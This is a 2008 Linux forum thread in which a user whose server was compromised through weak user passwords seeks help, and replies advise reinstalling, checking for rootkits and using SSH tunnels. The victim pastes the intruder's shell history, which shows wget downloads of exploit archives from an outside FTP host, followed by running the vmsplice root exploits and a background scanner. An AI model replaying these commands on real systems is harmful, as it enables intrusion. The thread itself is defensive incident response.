probably hacked

matto · 2008-11-24 09:42:21

Hi!
I use icecast+mpd to stream music to my workplace. to get that stream i use dyndns.
i also installed and configured sshd for remote control and vsftpd via xinetd. nothing bad so far i think.

the bad thing: i´ve set up some unprivileged users (username=password), very stupid i know.
to give some friends cheap and easy ftp access, to store some stuff (presentation for university e.g.).
and those users have ssh access too.

few days ago, i noticed due to cpu usage, thats something´s not right. I saw somebody logged into my machine, stopped sshd and
all other network related things. the user ran some scripts and i stoped them.
mainly some bash scripts using pscan2 (maybe this: http://packetstormsecurity.org/UNIX/scanners/pscan2.c )
all files were in the users home dir.
clamav, rkhunter and chkrootkit were only complaining about those files in the users homedir. (linux.rst.b)
nmap tells me that no port is opend, when my services are down.

now i am not sure if i am infected or if i was fast enough to stop that exploit(??)

nor i know what i should do now.

maybe someone can chenk my machine? i really don´t want to set it up again and hope thats not the only chance to sleep well again.

any advice? searching the web tells me that those tools that were used are about 6 years old.
i can put all that into are archive and upload it to rapidshare or so, if wanted.

sorry for my bad englich
greetings matto

fukawi2 · 2008-11-24 10:18:58

By the sounds of it, you're probably root-kitted. Once you've been root-kitted, you can't really be 100% sure if it's been cleaned. Root kits are designed to hide themselves, but modifying things like ps and netstat etc.

Your safest option is to reinstall I'm afraid.

ArchArael · 2008-11-24 10:26:17

Maybe you could fix things but If I was in your place I would reinstall everything. At least just to sleep well again.

thomasknowles · 2008-11-24 11:42:22

If you noticed that the ps scan was running at 100% before you killed it, then you are probably OK. but like fukawi2 and ArchArael suggests, it's really hard to be sure.

rson451 · 2008-11-24 12:49:42

I've never been in this situation, but if a rootkit modifies local binaries to hide itself, then couldn't you just boot from a live environment and run those scans off the live cd with the primary hdd mounted?

matto · 2008-11-24 14:31:22

Hi
thanks for your quick reply!
if i set up my machine again, can i keep my configuration files?
Are my private files .. infected or whatever with anything?

i set up my partitions as follows:

/dev/hdc2 on / type jfs (rw)
/dev/hdc5 on /var type jfs (rw)
/dev/hdc6 on /home type jfs (rw)           // i can leave this unchanged, right?
/dev/hdc7 on /mnt/mukku type jfs (rw)    // music
/dev/hdc8 on /mnt/zoix type jfs (rw)       // backups, other stuff

a general question:
the attaker tries to get root using 2 exploits.
what if these exploits don´t work ? was it possible for him to do any damage?
can i check this using the same exploits?
has anyone here ever tried or heard of those exploits?
anything to think about, before i try it?

here is the relevant history part, till i stopped all connections

   75  ps x
   76  w
   77  uname -a
   78  cat /proc/cpuinfo
   79  passwd 
   80  ps x
   81  passwd
   82  id
   83  ifconfg
   84  ifconfig
   85  cat /proc/cpuinfo
   86  mkdir .cornd
   87  wget ftp://89.39.167.131/k/expl2008.zip
   88  unzip expl2008.zip 
   89  rm -rf expl2008.zip 
   90  ./diane_lane
   91  ./jessica_biel
   92  ls -l
   93  cd .cornd
   94  rm -rf *
   95  ls la
   96  w
   97  uptime
   98  cat /etc/issue
   99  uname -a
  100  ps -afx
  101  wget ftp://89.39.167.131/k/vip.tgz
  102  tar zxvf vip.tgz
  103  rm -rf vip.tgz
  104  cd vip
  105  chmod +x *
  106  nohup ./start 92 >> /dev/null &
  107  rm -rf vuln.txt
  108  ps -x

i still have all these files, but moved to another dir, done with the "hacked" user

greetings matto

matto · 2008-11-24 19:14:22

hi again!

@rson451:
Good idea, i did that right now. i downloaded "grml", what looked pretty well for me.
same results there.

i´ve just a last question. if there is any backdoor oder irc-bot installed, will i see it listening with nmap?

greetings matto

fukawi2 · 2008-11-24 21:38:29

rson451 wrote:

I've never been in this situation, but if a rootkit modifies local binaries to hide itself, then couldn't you just boot from a live environment and run those scans off the live cd with the primary hdd mounted?

In theory yes, however it's still difficult to be 100% sure... IMHO, better safe than sorry...

matto wrote:

if i set up my machine again, can i keep my configuration files?
Are my private files .. infected or whatever with anything?

In theory, they shouldn't be infected, but it's hard to say... I would backup your home partition, then selectively restore your documents / music / etc and skip any .files or .folders incase something has been hidden in there. It's unlikely they hid anything in non-hidden folders as they have no way of knowing which folders you access regularly which would mean you would see strange files immediately.

matto wrote:

here is the relevant history part, till i stopped all connections
<SNIP>
i still have all these files, but moved to another dir, done with the "hacked" user

That's interesting... I work in Network Security - would you mind tar'ing that up and sending to me? I'd love to have a closer look...

matto wrote:

i´ve just a last question. if there is any backdoor oder irc-bot installed, will i see it listening with nmap?

If you're *SURE* your netstat hasn't been modified, then it will show... However if the root kit has modified netstat, then it will deliberatly hide it from you.

wuischke · 2008-11-24 22:03:44

No, nmap will not show you in all cases a hidden backdoor when you do a scan. If one uses for instance port knocking, nmap won't show you any activity. In general, however, this is rather improbable.

Allan · 2008-11-24 23:14:58

matto wrote:

here is the relevant history part, till i stopped all connections
   
   91  ./jessica_biel

jessica_biel is that kernel vmsplice exploit to get root powers that was found a couple of months back. That would have failed unless your system was very out of date.

You should google the other programs and see if you were vulnerable to any of them.

Edit: diane_lane is the same exploit as jessica_biel

Ruckus · 2008-11-25 00:09:42

I would do a complete reinstall.

I use the same basic setup as you outlined above, except the only ports open to the public are sshd(22) and port http(80), with root login disabled. To access everything else i use SSH tunnels. I tunnel Icecast for music and samba for file access over SSH. Since I'm using windows i use a modified putty that stores everything on a flash drive and attempts to reconnect on disconnect as well as the minimize to tray feature is really nice.

I would not use FTP for anything. I know it can be made secure, but really SSHFS for linux is a lot more secure and a lot easier to setup. For non linux users Samba is the way to go, for remote access I tunnel it over SSH see http://www.blisstonia.com/eolson/notes/smboverssh.php. Also, for most things like x11vnc/vncservers, be sure they only accept connections from localhost (your ssh tunnel).

Edit: When I'm at work i also use portable pidgin and portable Firefox to chat/browse the net. Check out dynamic port forwarding to tunnel all Firefox/pidgin traffic through your home computer to avoid firewalls and the local sys admins snooping on things.

Edit2: Here you can see my flash drive with all of my portable applications set up, and the modified putty setup with differant sessions saved.

Last edited by Ruckus (2008-11-25 00:17:02)

Arch Linux

#1 2008-11-24 09:42:21

probably hacked

#2 2008-11-24 10:18:58

Re: probably hacked

#3 2008-11-24 10:26:17

Re: probably hacked

#4 2008-11-24 11:42:22

Re: probably hacked

#5 2008-11-24 12:49:42

Re: probably hacked

#6 2008-11-24 14:31:22

Re: probably hacked

#7 2008-11-24 19:14:22

Re: probably hacked

#8 2008-11-24 21:38:29

Re: probably hacked

#9 2008-11-24 22:03:44

Re: probably hacked

#10 2008-11-24 23:14:58

Re: probably hacked

#11 2008-11-25 00:09:42

Re: probably hacked

Board footer